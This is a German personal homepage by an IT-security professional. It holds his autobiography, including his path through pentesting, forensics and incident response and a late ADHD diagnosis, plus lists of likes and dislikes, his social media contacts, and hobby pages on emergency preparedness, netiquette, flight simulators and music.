A new beginning

index

TL;DR

Du liest ungerne? Dann kann es durchaus sein, dass diese Seite nicht die Seite ist, die Du suchst.

Die Sinnfrage

Manchmal frage ich mich ja, warum ich eigentlich eine, bzw. mehrere Webseiten betreibe, die über die bloße Funktion (wie Dateiablage, Chat o.Ä.) hinausgeht. Oder die gar keine echte Funktion hat. Und alle paar Jahre bekomme ich einen Rappel und werfe alles über Bord, nur um auf den Ruinen die nächste aussagelose private Homepage zu erstellen.
Warum? Ich weiß es nicht. Vielleicht, um meinem Schreibdrang gerecht zu werden, den ich dann aber doch nie wirklich auslebe. Aber ich könnte ja! Bestimmt irgendwann. Morgen vielleicht. Oder nächstes Jahr. Vielleicht drängt auch der Imperativ, gefälligst eine eigene Webseite zu haben, wenn man etwas auf sich hält. Weil der berufliche Striptease auf LinkedIn und Xing nicht ausreicht, es muss auch noch etwas Privates für die Welt erhalten werden.
Wäre dieses Kleinprojekt ein Spiel, würde es vermutlich unter “Early Access” laufen. Als Programm würde ich es “Alpha 0.4” nennen. Musikalisch wäre es vielleicht eine Hörprobe, die mit dem Handy aufgenommen wurde.

Was auch immer diesmal die Gründe für ihre Existenz sind, es freut mich, dass Du über meine Homepage gestolpert bist. Vielleicht findest Du hier die eine oder andere spannende Information oder Anregung.
Und sollten Dich einige meiner Aussagen, meine politischen Einstellungen oder gelegentliche Gendersternchen und neutrale Bezeichnungen stören… ach, Du weißt ja bestimmt schon, wie man Webseiten leise wieder verlässt. :)

Bedienungsanleitung für diese Seite

I know, eine Webseite wie alle anderen - aber eventuell doch nicht. Standard-Funktionen wie die Suchfunktion brauche ich vermutlich wirklich nicht zu erklären, aber wusstest Du, dass jede Seite, auf der es mindestens eine Überschrift gibt, einen TOC (table of contents) hat? Oben links erscheint dann ein Menü-Symbol, Du kannst es auch mit STRG-ALT-t direkt öffnen. Direkt rechts daneben - das kennt man von diversen Diensten - die Breadcrumbs, mit denen man schnell eine oder mehrere Ebenen zurück navigieren kann. Und oben rechts lassen sich ganze Kapitel oder auch die ganze Seite mit allen Inhalten (von dieser Seite aus) ausdrucken. Die Pfeile daneben erlauben zudem eine schnelle Navigation zur jeweils vorigen oder nächsten Seite. Und wenn’s Dir farblich so gar nicht passt, klicke gerne unten links auf “Relearn Light/Dark” und wähle eine passendere Farbgebung aus. Die “gelesen”-Markierungen im Menü kannst Du über den Link “Verlauf löschen” zurücksetzen.

Welches CMS ist das? Und welches Theme?

Kein Wordpress, aber auch nichts direkt Handgeklöppeltes diesmal: Statische Seiten werden mit Hugo generiert und mit dem großartigen Relearn-Theme aufgehübscht.

Grafiken und Javascript

Ich versuche, die Seite schlank zu halten. Da lacht der Webkundige kurz auf und entdeckt die lokal servierten Javascript- und Symbol-Frameworks im Quelltext. sowie die Header-Grafiken.

Tatsächlich funktionieren die Grundfunktionen dieser Seite auch ganz ohne JS, Scriptblocker wie NoScript & Co. könnt ihr also zu Lasten der Suchfunktion und Teilen der Navigation anlassen.

Die Header-Grafiken sind mit Stable Diffusion (mittels WebUI-Forge) generiert, in den meisten Fällen verwende ich den Checkpoint Dreamshaper XL in Kombination mit dem nicht mehr öffentlich gelisteten Concept Art-LoRa (dessen Vorgänger vermutlich Atomhawk AoE2 Campaign Art Inspired Artstyle ist und ähnliche Ergebnisse liefern wird). Die genauen Parameter sind in jedem Bild codiert, wer sie nachbauen möchte kann sie also einfach auslesen.

Unterabschnitte von A new beginning

Über mich

about

Fakten, Fakten, Fakten

Möglicherweise der uninteressanteste Teil der Webseite…

Ernsthaft. Die meisten Besucher dieser Seite werden mich bereits kennen oder wegen einer der Themen unter Hobbies, Berufliches oder ADHS hierher gefunden haben. Wer wissen will, wo ich wohne oder wie ich erreichbar bin, wird mit dem Impressum glücklicher werden als mit der Lektüre dieses Bereiches. Und falls jemand nach Hinweisen für die Grundlage meiner Passwörter sucht, wird er hier ebenfalls nicht fündig werden - der Zufallsgenerator ist mein bester Freund. ;)
Von daher: Beschwere Dich nicht, wenn es wirklich langweilig ist. Los geht’s.

Oder: Skip

40 Jahre wall of text a.k.a. Sprechdurchfall

länglich

Ich wurde Anfang der 80er im schönen Hamburg geboren und wuchs im nördlichen Niedersachsen in einem kleinen Dorf auf. Meine Kindheit habe ich zur Hälfte im Wald und in der Natur verbracht, habe den Familienhund geärgert, in Ginstersträuchern erfolglos nach Ginsterkatzen gesucht, Höhlen gegraben, Baumhäuser geplant (zum Bau kam es leider nie) und meinen zwei kleineren Schwestern das Leben schwer gemacht. Ich hatte nur wenige Freunde, habe anderen lieber beim Spielen zugeschaut als selber mitzuspielen und habe die Nachbarin und den Postboten am Gartentor festgequatscht, bis diese irgendwann reißaus nahmen. Heute weiß ich, dass ich damals viele ADHS-typische Verhaltensweisen an den Tag gelegt habe, für meine Umwelt war ich halt einfach seltsam und irgendwie arrangierten sich alle damit.

Als Kind liebte ich Bücher, und so kam ich schon recht früh dazu, bei den Besuchen der Großeltern die Karl May-Sammlung durchzuackern. Später wurden mir einige der Perry Rhodan-Silberbände meines Onkels vermacht, die meine sowieso schon durch die regelmäßig auf der Flimmerkiste konsumierten Star Trek-Folgen (ja, TOS) getriggerte Liebe zur Science Fiction festigten.

Mit acht Jahren war dann das viele an der Luft spielen schlagartig vorbei. Mein Vater schenkte mir meinen ersten Computer, einen C64 mit Datasette. Ab da war es um mich geschehen. Ich hatte schon in den Jahren davor gerne mit dem Kosmos Elektronik-Experimentierkasten herumgespielt und auch das eine oder andere giftgrüne Wählscheibentelefon sowie diverse Batterieradios waren sehr zum Leidwesen meiner Eltern meinem Basteltrieb zum Opfer gefallen, aber der C64 war eine andere Liga. Nachdem alle Spiele (mein erstes: Zauberschloss!) durchgespielt waren, reizte mich vor allem das dicke Handbuch, das mir die ersten Schritte in BASIC und ein wenig Maschinensprache vermittelte. So kam ich als Knirps auch zu meinen ersten Englisch-Kenntnissen (in der Schule hatten wir das zu dieser Zeit noch nicht), quasi learning by doing. Mit Spielen wie Zauberschloss, Pacman und Digger lernte ich zudem alle Arten von Labyrinthen schätzen und habe nicht wenige Bücher mit Millimeterpapier genutzt, um mir eigene Labyrinthe, Fallen und Dungeons auszudenken. Das sollte mich Jahre später wieder einholen.

An meinen sozialen Schwierigkeiten änderte das alles natürlich nichts. Jedenfalls nichts im positiven Sinne. Nach über einem Jahrzehnt in meinem Heimatdorf zogen meine Eltern mit uns Kindern um, in meiner Jugend müssen es bestimmt drei oder vier Umzüge gewesen sein. Die damit verknüpften Schulwechsel machten es mir schwer, Anschluss zu finden und zu halten, ich rutschte meist sehr schnell in die Außenseiter-Ecke. Auf der Realschule und dem Gymnasium war ich schließlich ein (un)beliebtes Mobbingopfer, jedoch fand ich dort unter den wenigen Außenseitern Freunde. Freunde mit ähnlichen Interessen. Computer! Musik! Und ehe ich mich versah, kam ein weiteres Hobby dazu: Wir gründeten eine Rollenspielrunde zu viert. Ich weiß nicht, wie viele Wochenenden wir uns in Aventurien um die Ohren geschlagen haben, aber diese Leidenschaft bin ich seither nicht mehr losgeworden.

Die Zeit verging, das Internet kam. Nachdem ich während eines Praktikums und der folgenden Mini-Anstellung für die Einrichtung von Schulungs-Computern quasi freien Internetzugriff hatte, zog das erste ISDN-Modem auch bei uns zu Hause ein. Und was gab es nicht alles zu lernen: Wie E-Mail funktioniert, was eine Webseite ist und wie man sich mit HTML selber eine baut. Und da waren natürlich die Chaträume der großen Anbieter wie ChatCity, in denen ich fortan meine Abende und Nächte verbrachte. Nachdem meine Freundschaften aus der Schule aus verschiedenen Gründen wegbrachen, fand ich hier eine ganze Community von Außenseitern, Spinnern, Träumern… kurz: Leute wie mich. Über diverse Chat-Rollenspiele und andere Kanäle lernte ich mit etwa 16 Jahren dann auch neue musikalische Bereiche kennen: Gothic und Metal, denen ich bis heute sehr verbunden bin. Hier entstanden auch viele Freundschaften, ich fühlte mich das erste mal irgendwo zugehörig. Mit meinen IT-Kenntnissen zog ich erste Online-Community-Projekte hoch, auch das zog sich ab hier wie ein roter Faden durch mein Leben.

Mit Anfang 20 war ich schulisch gesehen am Ende. Ich hatte mehrfach das Klassenziel nicht erreicht, und als ich schwer erkrankte und mehrere Monate dem Unterricht nicht beiwohnen konnte, stellte mich die Schulleitung vor die Wahl: Entweder ich schaffe die (damals 11.) Klasse, oder ich verlasse die Schule. Da für mich klar war, dass ich das Klassenziel erneut nicht erreichen kann, war die Entscheidung relativ schnell getroffen. Ich verließ die Schule und bewarb mich bei verschiedenen Firmen um eine Ausbildungsstelle als Fachinformatiker. Leider waren nirgendwo noch Plätze frei und so nahm ich die einzige positive Rückmeldung an, man habe einen Platz für eine Ausbildung als Bürokauffrau frei. Ja, richtig, schon damals bestand man auf dem generischen Femininum. Mir sollte es recht sein, also sagte ich zu. Und nach zwei Monaten in einer reinen Mädchen-Klasse mit (aus meiner Sicht) unterfordernden Inhalten brach ich die Ausbildung wieder ab. Glücklicherweise suchte die Ausbildungsfirma zu dieser Zeit händeringend einen Administrator und so kam ich zu meinem ersten “richtigen” Job mit einem für meine damaligen Verhältnisse stattlichen Gehalt.

Den Rest meiner beruflichen Laufbahn erspare ich Dir an dieser Stelle, den kannst Du bei den einschlägigen Karriereseiten nachlesen.

Nachdem ich meine Heimat verlassen hatte, landete ich nach Zwischenstopps in Essen und Bochum schließlich in Bremen, wo ich dann mit Ende 20 noch einmal den Versuch wagte, eine Ausbildung zu beginnen. Und so wurde ich zum Fachinformatiker für Systemintegration. Nebenbei zog ich Bremens größte Online-Gothic-Community, das Schwarze Bremen, mit meiner damaligen Freundin hoch, die gute acht Jahre lang eine Institution für das Schwarzvolk in und um Bremen war. Kurz nachdem diese Community eingestampft wurde (die meisten Nutzer wanderten sowieso inzwischen zu Facebook ab), zog ich ebenfalls weiter, diesmal nach Berlin. In Berlin versuchte ich mich als Softwaretester im eID-Umfeld und später als Firewallprogrammierer im Rahmen von Gematik- und Smart Meter-Umfeld, war aber nicht so richtig glücklich mit meiner Arbeit. Und so suchte ich einige Jahre später einen neuen Job und landete bei meinem aktuellen Arbeitgeber, wo ich die Tücken und Freuden der harten IT-Security kennenlernte. Ich wechselte vom Penetrationstester zum Forensiker und schließlich zum Incident Response-Experten. Kurz nach dem Umzug nach Berlin wurde zudem die Band Stimmgewalt gegründet, die ich einige Jahre lang als Sänger auf den Bühnen begleiten durfte.

Neben anderen privaten Gründen hatte ich Bremen verlassen, weil ich mich komplett ausgebrannt fühlte. Für meine Ärzte war die Sache klar: Burnout. Es gab einige Versuche, das Ganze zu lindern, aber für mich war am Ende nur noch die Flucht nach vorne eine Option. Jahre später wurde in Berlin eine Depression diagnostiziert, deren Behandlung sich jedoch als schwierig erwies. Ich vertrug keins der verschriebenen Medikamente, darüber hinaus entfalteten sie auch keine der gewünschten Wirkungen. Ich nahm es hin, die Depression hatte laut den Experten wohl bereits mit dem vermeintlichen Burnout etliche Jahre zuvor begonnen. Über vier Jahre hinweg war ich mehr oder weniger arbeitsunfähig, wurde von meinem Arbeitgeber aber sehr gut unterstützt und aufgefangen. Durch Freunde, Familie und Arbeitskollegen wurde ich schließlich auf die Symptome von ADHS aufmerksam gemacht und besuchte schließlich Ende 2023 einen Facharzt, der sich auf ADHS bei Erwachsenen spezialisiert hat. Und plötzlich steht eine ganz andere Diagnose im Raum, die entgegen der Depression sehr gut medikamentös behandelt werden kann. Was soll ich sagen: Es hilft.

Mag ich

Genug Geschichtsunterricht, hier ein paar Dinge, die ich mag bzw. für die ich brenne:

  • Musik / Konzerte / Festivals
  • Rollenspiele (Pen&Paper, Live & PC)
  • Programmieren
  • Naturwissenschaften
  • Speziell: Astrophysik
  • Elektronik (Arduino- und Raspberry Pi-Projekte)
  • Schlechte Filme (SchleFaZ lässt grüßen)
  • Dokumentationen
  • Das Meer (Nord- und Ostsee)
  • Laser- und CNC-Fräsen
  • Linux
  • IT-Sicherheit
  • Familie und Freunde
  • Sushi
  • Tee
  • Dunkle Farben, Schwarz
  • Kaltes Wetter, Sturm, Gewitter
  • IT-Security, Hacking, Hackercamps, Security-Congresse
  • Worldbuilding
  • Spiele (hauptsächlich am PC)
  • KI-generierte Kunst
  • Science Fiction
  • Bücher
  • Natur
  • Radfahren
  • Private Notfallvorsorge
  • Tiere (vor allem Hunde, Katzen, Schildkröten)
  • Positiven Umgang mit Menschen
  • Mate
  • Norddeutsche Küche
  • Menschen wertschätzen
  • Gelassenheit, peace of mind
  • assume goodwill
  • Sterillium
  • FFP-Masken
  • Sprachen: Russisch, Isländisch, Dänisch, Norwegisch, Englisch
  • Airsoft, Paintball
  • Neurodiversität

Mag ich nicht

  • Hitze
  • Impfgegner, Klimawandel-Leugner, Maskengegner
  • Reichsbürger, Schwurbler, Antrophosophen, Homöopathen
  • AfD, “Querdenker”, Nazis, Rechtsradikale
  • Extremisten
  • Lügen
  • Berufspolitiker
  • Anderen eine Meinung/Weltanschauung aufzwingen
  • ICH-Denken
  • Ellenbogenkultur
  • Unzuverlässigkeit
  • Hinter dem Rücken reden, verleumden
  • Probleme nicht direkt ansprechen, sondern “nach oben eskalieren”
  • Hass, Missgunst
  • Stress
  • Krankheit
  • Selbstzweifel, Unsicherheit
  • Dinge, die sich nicht reparieren lassen
  • Kapern
  • Glücksspiele
  • Kriegstreiber
  • Klimawandel
  • Miethaie
  • “told you so”-Situationen
  • Handeln entgegen besseren Wissens
  • Helligkeit
  • Apple, Microsoft
  • Die französische Sprache
  • Stagnation
  • Ignoranz
  • (anlasslose) Überwachung
  • Unerwünschte Werbung, Recruiter

Soziale Medien & Kontakt

Wo man mich findet:

Mastodon

preferred

Man findet mich als @ph0lk3r@geraffel.social im Fediverse via Mastodon.

Diaspora

Man findet mich als @kainsrache@despora.de im Fediverse via Diaspora.

Pixelfed

Man findet mich als @ph0lk3r@pixelfed.de im Fediverse via Pixelfed.

PeerTube

Man findet mich als @ph0lk3r@kraut.zone im Fediverse via PeerTube.

LinkedIn

Man findet mich als Folker Schmidt auf LinkedIn.

Xing

Man findet mich als Folker Schmidt auf Xing.

Facebook

Nein.

Twitter

Nein.

Blue Sky

Nein.

Sonstige

Siehe Impressum

Hobbies

hobbies

Dinge, die mich privat (und oft auch beruflich) interessieren.

Weitere Inhalte folgen

Unterabschnitte von Hobbies

Lockpicking (WIP)

Ich beschäftige mich privat mit Lockpicking, also dem zerstörungsfreien Öffnen von Schließmechanismen.

Survival & Natur

Nicht nur im Katastrophenfall, auch auf Rad- oder Wandertouren durch die Natur oder beim Geocaching kann es durchaus von Vorteil sein, sich selbst helfen zu können, wenn die Technik versagt.

Ich bin in einem kleinen Dorf direkt neben einem Wald aufgewachsen und meine Eltern und die anderen Verwandten brachten mir schon als Kind viele Tipps & Tricks rund um die Natur bei. Sei es der Bau eines Schutzes vor Regen und Wetter, das Wissen um die verschiedenen Möglichkeiten, ein Feuer zu entzünden oder Tipps, wie man auch ohne Kompass die Himmelsrichtung bestimmt oder wie man Wasser grundlegend trinkbar macht - so etwas im Zweifelsfall zu wissen kann Leben retten. Natürlich hoffe ich, dieses Wissen niemals ernsthaft zu benötigen, aber… better safe than sorry!

Unterabschnitte von Survival & Natur

Notfallvorsorge

Der Krisenfall

Was tun, wenn mal für mehr als ein paar Stunden der Strom ausfällt oder mehrere Tage kein Wasser verfügbar ist? Unsere moderne Infrastruktur ist Fluch und Regen zugleich, sie ermöglicht uns ein relativ unbeschwertes und luxuriöses Leben, zum anderen haben wir uns aber auch ultimativ abhängig davon gemacht. Unsere Nahrungsmittel halten selbst frisch mehrere Tage, aber nur, wenn sie gut gekühlt werden. Gefrierschränke verlängern die Haltbarkeit auf Wochen bis Monate. Und unser fließendes Wasser kommt immer frisch aus dem Wasserhahn und ist direkt trinkbar.

Fallen Strom- oder Wasserversorgung für längere Zeit aus, kommen wir schnell in Situationen, die für den Einzelnen kaum handhabbar sind. Zu beobachten war dies unter anderem Mitte 2021 im Ahrtal, als eine Überflutung große Teile der Infrastruktur und die Wohnungen der Anwohner zerstörte. Mehrere tausend Menschen standen plötzlich ohne Strom, frisches Wasser und medizinische Versorgung da. Doch auch ein regionaler oder überregionaler Zusammenbruch des Stromnetzes könnte schon nach kurzer Zeit ähnliche Auswirkungen haben.

Notfallvorsorge gemäß BBK

Das Bundesamt für Bevölkerungsschutz und Katastrophenhilfe (BBK) betreibt eine eigene Webseite, auf der viele Tipps gegeben werden, wie man selbst Vorsorgemaßnahmen treffen kann, um im Ernstfall wenigstens für ein paar Tage autark zu sein. Dabei geht es nicht darum, im Keller oder auf dem Dachboden hunderte Dosen an Notfallrationen, tausende Liter Wasser und kistenweise Medikamente zu horten. Die Vorschläge des BBK zielen viel eher darauf ab, die ersten Stunden und Tage nach einer Störung der Infrastruktur eigenständig überleben zu können, ohne auf moderne Technik, Supermärkte und Lieferdienste vertrauen zu müssen. Dabei sind die meisten Maßnahmen ohne große finanzielle Investitionen möglich, eine Integration von Vorräten in eine laufende Rotation ist in den meisten Fällen möglich. So können Vorräte auch Stück für Stück über Monate hinweg angelegt werden.

Meine persönliche Vorsorge

Krisenvorsorge ist etwas sehr persönliches. Während vermutlich die meisten Einwohner Deutschlands sich noch nie ernsthaft Gedanken um das “was wäre wenn?” gemacht haben, bilden sogenannte Prepper das andere Ende des Extrems. Unter Preppern versteht man Menschen, die sich bis ins Detail auf Katastrophensituationen vorbereitet haben und neben Vorräten für ein paar Tage, Wochen oder Monate auch gleich noch an alles andere (wie Schutzkleidung, Werkzeug, Funkgeräte, etc.) gedacht haben und meist über umfangreiches Wissen über Survival und oft auch Selbstverteidigung verfügen. Der Begriff “Prepper” wird leider häufig abfällig verwendet, für realitätsferne Spinner, die sich private Atombunker bauen, die sie nue benötigen werden. Doch das geht weit am Kern der Sache vorbei. Der Begriff “Prepping” leitet sich von “be prepared”, also “sei vorbereitet” ab. Und genau darum geht es: auf Situationen, die stark von der gelebten Normalität abweichen, vorbereitet zu sein und so gut wie möglich damit umgehen zu können.

Ich selbst würde mich zwar nicht als Vollblut-Prepper bezeichnen, aber ich lege großen Wert darauf, für den Notfall trotzdem grundlegend vorbereitet zu sein. Meine Vorkehrungen dürften auch das übertreffen, was Otto Normalbürger üblicherweise zu Hause herumstehen hat, daher hier eine kleine Aufstellung dessen, was ich für mich persönlich vorhalte:

Der Notfallrucksack sollte immer fertig gepackt sein und das Wichtigste enthalten, was man bei einem schnellen Verlassen der Wohnung für ein paar Tage benötigt. Ich persönlich handhabe es anders, ich habe mehrere Kisten mit den oben genannten Artikeln und würde den Rucksack schnell nach Bedarf packen - je nachdem, ob ich überhaupt die Wohnung verlassen muss, ob dies für ein paar Tage temporär oder gar permanent geschieht und auch abhängig davon, ob ich in der Nähe bleibe und irgendwo unterkomme, oder ob ich mich auf Überleben in der Natur einstellen muss. Da ich kein Auto besitze, ist die Auswahl der Notfall- und Survival-Artikel darauf beschränkt, was ich maximal mit zwei Satteltaschen und einem Rucksack sinnvoll transportieren kann.

Falls sich jemand über das Lockpicking-Set, den Sperrhaken und die Schaltschrank-Schlüssel wundert: Ich bin Hobby-Lockpicker und beschäftige mich mit dem Öffnen von Schlössern aller Art. In einem Notfall kann es vorkommen, dass das Öffnen von verschlossenen Türen notwendig wird und mechanische Kraft nicht die beste Lösung darstellt. Sei es, um eingeschlossene Menschen zu befreien oder auch, um im Freien Unterschlupf in Gefahrensituationen zu finden, zum Beispiel bei Sturm in einer Gartenlaube. Aus rechtlicher Sicht wäre so etwas mit Sicherheit fragwürdig bis illegal, doch der Schutz von Leib und Leben hat im Zweifel Vorrang.

Kultur

culture Kultur - das klingt so abgehoben, mir fällt aber derzeit kein besserer übergreifender Begriff ein. Kultur kann vieles sein, für mich besteht sie im täglichen Leben hauptsächlich aus Musik, Filmen, Festivals und Reisen. Wer Opern, klassische Musik und große Meister sucht, wird hier vermutlich wohl eher nicht fündig.

Unterabschnitte von Kultur

Netiquette

Die Netiquette begleitet mich eigentlich schon mein ganzes Onlinelieben lang. Und irgendwie bin ich hin- und hergerissen. Zum einen empfinde ich die in den verschiedenen Ausprägungen dieses Verhaltens-Regelwerks als sinnvoll und teilweise auch notwendig, zum anderen irritiert es mich allerdings nach wie vor, dass all diese Regeln extra niedergeschrieben werden müssen, weil sie für mich nahezu ausnahmslos selbstverständlich sind.

Mein Problem an dieser Stelle ist, dass ich meine Erziehung und meine eigenen moralischen Standards auf andere projiziere. Ich erwarte, dass andere Menschen genauso funktionieren. Das führt oft genug zu Enttäuschungen auf beiden Seiten, ich kann es nur leider nicht abstellen. Meine Grundüberzeugungen sind ein integraler Bestandteil meiner Persönlichkeit, die werde ich nicht ändern (können) - und will es auch nicht. Daher irritiert es mich immer wieder, wenn Menschen sich nicht an dieselben Grundregeln des menschlichen Miteinanders orientieren wie ich.

Dabei ist die Netiquette für mich eigentlich mit einem Satz zusammenfassbar: “Sei kein Arschloch und respektiere die Grenzen Deiner Mitmenschen”. Genau wie im real life. Ja, das beinhaltet in den meisten Fällen, noch einmal kurz nachzudenken, bevor man etwas raushaut. Ist es offensiv? Ist es verletzend? Kann mein Gegenüber es vielleicht dennoch so interpretieren? Kann ich es ggf. entschärfter formulieren? Und wenn nicht: Muss ich überhaupt etwas schreiben?

Ich versuche daher, mich an ein paar einfache Regeln zu halten und würde mich freuen, wenn jede Person, die mit mir Kontakt aufnimmt, diese ebenfalls respektiert:

  • Verhalte Dich der Situation angemessen
  • Verzichte auf Anfeindungen, Angriffe oder Beleidigungen
  • Gehe in einem Disput nicht “ad hominem”, bleibe also auf sachlicher Ebene
  • “Bitte” und “danke” erhöhen die Chance, positiv wahrgenommen zu werden
  • Forderungen sind in den meisten Fällen unangemessen
  • Außerhalb des beruflichen Kontexts bitte nicht “siezen” ;)
  • Nicht alles muss kommentiert werden
  • “Nein” heißt “nein”, respektiere Grenzen
  • Bei Missverständnissen am besten direkt nachfragen, die meisten lassen sich schnell klären
  • Sag Bescheid, wenn Du Dich mit einer Situation unwohl fühlst
  • Toleriere die Eigenheiten Deines Gegenübers und respektiere sie, wenn möglich

Das alles sind Dinge, die ich einzuhalten versuche. Ich zwinge niemanden, sich daran zu halten und glaube auch nicht, dass diese Regeln allgemeingültig überall funktionieren. Für mich (und im Kontakt mit mir) erscheinen sie aber sinnvoll.

Unterabschnitte von Spiele (WIP)

Flugsimulatoren

Rückblickend sind Flugsimulatoren vermutlich das eine Genre, das sich von Anfang an bis heute wie ein roter Faden durch meine Spielegeschichte zieht. War es damals am C64 noch der Einstieg mit Mig Alley Ace, Ace of Aces und - ganz simpel und noch nicht mal ein Simulator - Airwolf, ging es auf dem ersten PC dann rund: Secret Weapons of the Luftwaffe, Aces Over Europe, 1942: The Pacific Air War, A-10 Cuba, EF 2000, F22 Raptor und natürlich der legendäre Microsoft Flight Simulator sowie diverse andere Produkte dieses Genres (ganz aktuell: X-Plane 12) landeten auf den verschiedenen PCs, die ich bis heute mein Eigen nennen durfte. Natürlich blieb es auch nicht nur bei realistischen Simulatoren: Schon damals war ich dem originalen Elite unter DOS verfallen, später kam Egosofts X-Reihe dazu (der ich bis heute treu bin) und natürlich die moderne Elite-Version Elite: Dangerous. Und seit ich Kerbal Space Program (nicht Version 2, die eine mittelschwere Katastrophe darstellt) spiele, verstehe ich sogar ein wenig Orbitalmechanik und habe mich in die Herausforderungen der realistischen Navigation im luftleeren Mikrogravitations-Raum eingearbeitet.

Faszination Technik & Verständnis

Was mich an dem Genre (und allen Subgenres) so reizt? Vermutlich die Kombination aus Geschicklichkeit, dem benötigten Verständnis der Flugmechaniken und natürlich der Technik ansich. Je umfangreicher, je präziser eine Simulation ist, desto mehr kann ich darin versinken. Flugzeuge starten und landen: Geschenkt, ersteres ist eine reine Fingerübung, letzteres je nach Umgebungsparametern schon eine Herausforderung. Aber hast Du schon einmal versucht, ein komplett abgeschaltetes Flugzeug hochzufahren und abflugbereit zu machen? Oder den Autopiloten richtig zu programmieren? Mit zufälligen Fehlern und Ausfällen der komplexen Bord-Systeme im Flug zurecht zu kommen?

Setz mich vor einen Flugsimulator mit hunderten von Knöpfen, Schaltern, Anzeigen und anderen Bedienelementen und ich bin für die nächsten Stunden beschäftigt. Gerade Software wie das oben genannte X-Plane 12 hat eine unglaubloche Fülle an realistisch simulierten Flugzeugen, komplett mit 3D-Cockpit und größtenteils funktionsfähigen Cockpit-Elementen. Ignoriert man die Ansagen des Towers oder der weiteren Flugkontrolleure, zieht das den Abbruch der Flugleitung nach sich, man ist also bis zur erneuten Kontaktaufnahme auf sich gestellt. Flugpläne können erstellt und dem Tower übermittelt werden, man wechselt von einer Funkbake zur anderen, kurz: So einen Vogel real zu fliegen kann kaum spannender sein.

Aktuelles Equipment

Sowohl meine Weltraum- als auch die Atmosphären-Simulatoren würden nur halb so viel Spaß machen, wenn nicht wenigestens halbwegs brauchbare Kontrollen verfügbar wären. Von den knubbeligen C64-Joysticks bis meinem aktuellen Saitek X52 H.O.T.A.S. oder gar Profi-Systemen war es ein weiter Weg, aber ohne möchte ich kein virtuelles Flugzeug mehr besteigen müssen. Und da manchmal die Buttons oder Achsen nicht ausreichen, kann man die meisten Simulatoren problemlos mit mehreren Geräten betreiben. Ich habe beispielsweise ein Elgato Stream Deck und das Side Panel des Logitech Farm Simulator Heavy Equipment Bundles, das ich als Restposten günstig geschossen habe, im Einsatz. Mir fehlen noch Ruderpedale, aber die Sammlung wächst stetig und es ist nur eine Frage der Zeit, bis ich mir die auch noch besorge. Mindestens der X-Plane 12-Simulator unterstützt neben mehreren Eingabegeräten auch mehrere Monitore und so fliege ich derzeit gemütlich mit Blick auf das komplette Cockput durch die virtuelle Weltgeschichte.

Autitives

audio Hörgenüsse aller Art, sei es nun Musik oder ein gut gemachtes Hörspiel, möchte ich Dir in dieser Rubrik vorstellen.

Ich stand - und stehe - außerdem gleichermaßen gerne vor Mikrofonen und Lautsprechern als auch dahinter, mal alleine, mal mit anderen Menschen.

Unterabschnitte von Autitives

Musik

music

Musik war und ist ein großer Teil meines Lebens. Ich möchte gerne meine eigenen Erfahrungen vor, auf und hinter der Bühne mit euch teilen.

Unterabschnitte von Musik

Unterabschnitte von Ayreon

Ayreon Universe

ayreonuniverse

Mit Ayreon Universe ist das vormals als unmöglich Angenommene möglich gemacht worden.

Eine Live-Show, mit all den Gastmusikern der verschiedenen Bands, die Ayreon so besonders machen. Qualitativ stand die Show den Studioalben in nichts nach und so verwundert es nicht, dass direkt aus den Aufnahmen von drei Performances ein weiteres Album zusammengestellt wurde.

Wetere Inhalte folgen.

Grailknights

grailknights

Die Grailknights sind Hannovers superheldigste Power Metal-Band, die wieder und wieder (und wieder) gegen Dr. Skull antreten müssen.

Inhalte folgen.

Lacuna Coil

lacuna coil

Lacuna Coil ist feinster italienischer Alternative Metal mit starken Gothic-Einflüssen.

Inhalte folgen.

Larkin Poe

larkin poe

Larkin Poe, das Schwestern-Duo aus Atlanta, überzeugt mit energetischem Südstaaten Roots-Rock.

Inhalte folgen.

Orphaned Land

orphaned land

Orphaned Land aus Israel sind die Erfinder des Oriental Metal und rocken auch nach 30 Jahren die Bühnen der Welt und setzen sich für Völkerverständigung ein.

Inhalte folgen.

Scardust

scardust

Die Female-fronted Progressive Metal-Band Scardust aus Israel begeistern mit mitreißendem Oriental Metal, den sie erstmals 2018 live in Berlin unter’s Volk brachten.

Inhalte folgen.

Stimmgewalt

stimmgewalt

Dark A Cappella aus Berlin. 12 Stimmen, keine Instrumente, 100% Power. Neben verschiedenen Covern ziehen die Mädels und Jungs seit einigen Jahren auch mit eigenen Produktionen alle Register.

Inhalte folgen.

Van Canto

van canto

RAKKA TAKKA! Van Canto produzieren mächtigen A Cappella Heavy-Metal. Unterstützt von einem Schlagzeug und reichlich Stimmpower machen die Auftritte mächtig Spaß.

Inhalte folgen.

VNV Nation

vnv nation

VNV Nation - von tanzbaren Electro-Stücken wie Automatic bis zu Balladen, die einem die Tränen in die Augen treiben, liefert Ronan Harris mit seiner Future Pop Ein-Mann-Show das volle Spektrum an Emotionen.

Inhalte folgen.

Reisen

travel Es muss nicht immer das Ausland sein, auch Deutschland hat unglaublich schöne Orte, die man mal besucht haben sollte. Wenn es dann doch mal über die heimischen Grenzen hinausgeht, habe ich eine Vorliebe für den kühlen Norden, mit der schwülwarmen Luft im Süden komme ich eher nicht so gut klar. Aber Ausnahmen bestätigen auch hier die Regeln, wie ich feststellen durfte.

Unterabschnitte von Reisen

Unterabschnitte von Ausland (WIP)

Unterabschnitte von Visuelles (WIP)

Unterabschnitte von Museen und Ausstellungen (WIP)

Unterabschnitte von Unbewegt (WIP)

Unterabschnitte von KI Bildgenerierung (WIP)

Stardew Valley

Es gibt Tage, an denen versinke ich stundenlang in Stardew Valley. Ein Spiel, das von nur einem Entwickler (Eric Barone a.k.a. ConcernedApe) hauptverantwortlich entwickelt wird, auch wenn seit ca. 2018 weitere Entwickler unter anderem das Multiplayer-Framework, die Portierung auf weitere Plattformen und weitere Funktionen übernommen haben.

Was mich so an dem Spiel reizt? Trotz seiner repetetiven Kernstruktur (Tag beginnt, man schaut nach den Feldern, den Viechern und ggf. schaut man noch bei den Nachbarn vorbei, kauft ein, schlägt Holz oder haut Monster in den Minen platt, danach ins Bett und noch mal von vorn) bietet es gerade im gemoddeten Zustand unzählige Variationen, es gibt viel zu entdecken und kein (Spiel-)Tag ist wie der andere.

